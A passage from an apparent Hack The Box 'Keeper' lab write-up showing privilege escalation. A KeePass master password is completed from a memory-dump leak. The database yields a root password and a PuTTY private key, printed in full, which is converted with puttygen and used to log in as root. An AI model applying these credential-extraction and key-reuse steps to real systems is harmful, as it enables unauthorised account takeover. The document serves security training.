Privilege Escalation

As shown previously, I was able to successfully mine a password from the KeePass memory dump file using an exploit PoC However, the result still appeared incomplete due to the first and second characters being unidentified

As the identified part of the password appears to be a phase, I decided to look it up on Google

Google’s auto completion reveals that it might be rødgrød med fløde

It works. The password for the KeePass DB file is rødgrød med fløde

There is a Network credential for the root user; F4><3K0nd!

lnorgaard@keeper:~$ su root
password: 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ sshpass -p 'F4><3K0nd!' ssh root@keeper.htb
Permission denied, please try again.

The credential doesn’t seem to work

Putty

Looking more into the entry, there is a note Based on the context, it seems to be used for Putty

Looking it up online further regarding the content reveals that it’s the content of a PPK file PPK file is a Putty Key file format

puttygen

another online resource revealed that SSH key pair could be extracted from a PPK file using a tool named, puttygen, which is part of the putty-tools suite

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ sudo apt install putty-tools

installing the putty-tools suite

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ cat ssh.ppk
putty-user-key-file-3: ssh-rsa
encryption: none
comment: rsa-key-20230519
public-lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
private-lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
private-mac: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

I then saved the PPK content to a file, ssh.ppk

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ puttygen ssh.ppk -O private-openssh -o id_rsa.root
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ puttygen ssh.ppk -O public-openssh -o id_rsa.root.public 
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ chmod 600 id_rsa.root

Extracting the SSH key pair from the ssh.ppk file

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ ssh root@keeper.htb -i ./id_rsa.root          
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
You have new mail.
last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~# whoami
root
root@keeper:~# hostname
keeper
root@keeper:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.227  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:58e5  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:58e5  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:58:e5  txqueuelen 1000  (Ethernet)
        RX packets 1169917  bytes 179693986 (179.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1488508  bytes 1017085094 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2567624  bytes 371612836 (371.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2567624  bytes 371612836 (371.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromised

InfoSec LAB

Explorer

Keeper_Privilege_Escalation

Privilege Escalation

Putty

puttygen

Interactive Graph View

Table of Contents

Backlinks